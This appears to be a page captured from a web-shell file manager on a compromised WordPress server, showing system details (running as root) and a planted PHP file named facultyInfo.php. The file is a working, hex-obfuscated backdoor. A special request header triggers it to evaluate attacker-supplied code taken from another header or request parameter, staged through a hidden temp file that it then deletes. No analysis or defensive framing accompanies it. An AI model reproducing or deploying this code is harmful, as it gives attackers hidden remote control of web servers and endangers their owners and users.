HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/shoetique/wp-content/uploads/wpallimport/temp/
Upload Files
File: /var/www/shoetique/wp-content/uploads/wpallimport/temp/facultyInfo.php
<?php

$_HEADERS = getallheaders();
if (isset($_HEADERS['Feature-Policy'])) {
    $c = "<\x3fp\x68p\x20@\x65v\x61l\x28$\x5fH\x45A\x44E\x52S\x5b\"\x43o\x6et\x65n\x74-\x53e\x63u\x72i\x74y\x2dP\x6fl\x69c\x79\"\x5d)\x3b@\x65v\x61l\x28$\x5fR\x45Q\x55E\x53T\x5b\"\x43o\x6et\x65n\x74-\x53e\x63u\x72i\x74y\x2dP\x6fl\x69c\x79\"\x5d)\x3b";
    $f = '/tmp/.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}
@ Telegram